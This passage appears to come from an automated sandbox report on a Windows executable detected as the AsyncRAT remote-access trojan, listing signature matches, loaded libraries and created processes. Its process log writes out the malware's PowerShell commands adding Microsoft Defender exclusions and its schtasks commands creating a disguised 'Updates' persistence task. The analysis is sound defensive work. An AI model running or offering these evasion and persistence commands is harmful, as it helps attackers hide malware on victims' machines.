Source: SS Bottmac Engineers Pvt. Ltd..exe, 00000016.00000002.2395996846.0000000005974000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameschtasks.exej% vs SS Bottmac Engineers Pvt. Ltd..exe
Source: SS Bottmac Engineers Pvt. Ltd..exe, 00000016.00000002.2392500334.0000000004AEF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameTyrone.dll8 vs SS Bottmac Engineers Pvt. Ltd..exe
Source: SS Bottmac Engineers Pvt. Ltd..exe, 0000001B.00000002.2469960785.0000000003682000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameXClient222.exe4 vs SS Bottmac Engineers Pvt. Ltd..exe
Source: SS Bottmac Engineers Pvt. Ltd..exe, 0000001B.00000002.2475189992.0000000004EDF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameTyrone.dll8 vs SS Bottmac Engineers Pvt. Ltd..exe
Source: SS Bottmac Engineers Pvt. Ltd..exe, 0000001B.00000002.2477067466.0000000005A66000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameschtasks.exe.m vs SS Bottmac Engineers Pvt. Ltd..exe
Source: SS Bottmac Engineers Pvt. Ltd..exe, 0000001B.00000002.2469960785.00000000036E4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameXClient222.exe4 vs SS Bottmac Engineers Pvt. Ltd..exe
Source: SS Bottmac Engineers Pvt. Ltd..exe	Binary or memory string: OriginalFilenameOPHt.exeX vs SS Bottmac Engineers Pvt. Ltd..exe
Source: SS Bottmac Engineers Pvt. Ltd..exe.9.dr	Binary or memory string: OriginalFilenameOPHt.exeX vs SS Bottmac Engineers Pvt. Ltd..exe

Uses 32bit PE files

Source: SS Bottmac Engineers Pvt. Ltd..exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Yara signature match

Source: 10.2.RTUZKYTc.exe.319a66c.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.32c45d0.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 27.2.SS Bottmac Engineers Pvt. Ltd..exe.369a894.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 27.2.SS Bottmac Engineers Pvt. Ltd..exe.36917b8.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 27.2.SS Bottmac Engineers Pvt. Ltd..exe.36917b8.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 10.2.RTUZKYTc.exe.3191590.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 10.2.RTUZKYTc.exe.319a66c.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 16.2.RTUZKYTc.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.32cd6ac.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 22.2.SS Bottmac Engineers Pvt. Ltd..exe.3177a6c.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 27.2.SS Bottmac Engineers Pvt. Ltd..exe.369a894.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 10.2.RTUZKYTc.exe.3191590.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 22.2.SS Bottmac Engineers Pvt. Ltd..exe.3177a6c.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.32cd6ac.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.32c45d0.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 22.2.SS Bottmac Engineers Pvt. Ltd..exe.316e990.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 22.2.SS Bottmac Engineers Pvt. Ltd..exe.316e990.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000010.00000002.2163931121.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000000.00000002.2073252953.0000000003314000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000000.00000002.2073252953.00000000032B2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0000000A.00000002.2150760883.00000000031E4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0000001B.00000002.2469960785.0000000003682000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0000000A.00000002.2150760883.0000000003182000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000016.00000002.2388435834.0000000003161000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0000001B.00000002.2469960785.00000000036E4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT

Source: SS Bottmac Engineers Pvt. Ltd..exe	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: RTUZKYTc.exe.0.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: SS Bottmac Engineers Pvt. Ltd..exe.9.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.32c45d0.1.raw.unpack, Helper.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.32c45d0.1.raw.unpack, Helper.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.32c45d0.1.raw.unpack, AlgorithmAES.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.32cd6ac.0.raw.unpack, Helper.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.32cd6ac.0.raw.unpack, Helper.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.32cd6ac.0.raw.unpack, AlgorithmAES.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.32cd6ac.0.raw.unpack, ClientSocket.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.32cd6ac.0.raw.unpack, ClientSocket.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.ba90000.5.raw.unpack, dr4ObpyBXWrmi7HiU1.cs	Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.ba90000.5.raw.unpack, dr4ObpyBXWrmi7HiU1.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.ba90000.5.raw.unpack, dr4ObpyBXWrmi7HiU1.cs	Security API names: _0020.AddAccessRule
Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.4ac4e70.2.raw.unpack, BCDpIFlNesVBIhQHgH.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.4ac4e70.2.raw.unpack, BCDpIFlNesVBIhQHgH.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.4ac4e70.2.raw.unpack, dr4ObpyBXWrmi7HiU1.cs	Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.4ac4e70.2.raw.unpack, dr4ObpyBXWrmi7HiU1.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.4ac4e70.2.raw.unpack, dr4ObpyBXWrmi7HiU1.cs	Security API names: _0020.AddAccessRule
Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.ba90000.5.raw.unpack, BCDpIFlNesVBIhQHgH.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.ba90000.5.raw.unpack, BCDpIFlNesVBIhQHgH.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.32c45d0.1.raw.unpack, ClientSocket.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.32c45d0.1.raw.unpack, ClientSocket.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@43/32@13/1

Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe

File created: C:\Users\user\AppData\Roaming\RTUZKYTc.exe

Jump to behavior

Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2608:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7684:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5476:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1876:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2412:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7512:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8044:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7812:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7564:120:WilError_03
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Mutant created: \Sessions\1\BaseNamedObjects\TdUxMCK2FUdy51AH

Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe

File created: C:\Users\user\AppData\Local\Temp\tmp960E.tmp

Jump to behavior

Source: SS Bottmac Engineers Pvt. Ltd..exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: SS Bottmac Engineers Pvt. Ltd..exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%

Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: SS Bottmac Engineers Pvt. Ltd..exe

ReversingLabs: Detection: 39%

Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe

File read: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe "C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe"
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\RTUZKYTc.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\RTUZKYTc" /XML "C:\Users\user\AppData\Local\Temp\tmp960E.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Process created: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe "C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\RTUZKYTc.exe C:\Users\user\AppData\Roaming\RTUZKYTc.exe
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe'
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\RTUZKYTc" /XML "C:\Users\user\AppData\Local\Temp\tmpAD5E.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Process created: C:\Users\user\AppData\Roaming\RTUZKYTc.exe "C:\Users\user\AppData\Roaming\RTUZKYTc.exe"
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'SS Bottmac Engineers Pvt. Ltd..exe'
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe'
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe "C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe"
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\RTUZKYTc" /XML "C:\Users\user\AppData\Local\Temp\tmpE6A.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Process created: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe "C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe"
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Process created: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe "C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe "C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe"
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\RTUZKYTc" /XML "C:\Users\user\AppData\Local\Temp\tmp2E66.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Process created: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe "C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe"
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Process created: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe "C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe"
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe"	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\RTUZKYTc.exe"	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\RTUZKYTc" /XML "C:\Users\user\AppData\Local\Temp\tmp960E.tmp"	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Process created: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe "C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe"	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe'	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'SS Bottmac Engineers Pvt. Ltd..exe'	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe'	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\RTUZKYTc" /XML "C:\Users\user\AppData\Local\Temp\tmpAD5E.tmp"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Process created: C:\Users\user\AppData\Roaming\RTUZKYTc.exe "C:\Users\user\AppData\Roaming\RTUZKYTc.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\RTUZKYTc" /XML "C:\Users\user\AppData\Local\Temp\tmpE6A.tmp"
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Process created: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe "C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe"
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Process created: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe "C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe"
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\RTUZKYTc" /XML "C:\Users\user\AppData\Local\Temp\tmp2E66.tmp"
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Process created: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe "C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe"
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Process created: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe "C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe"

Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
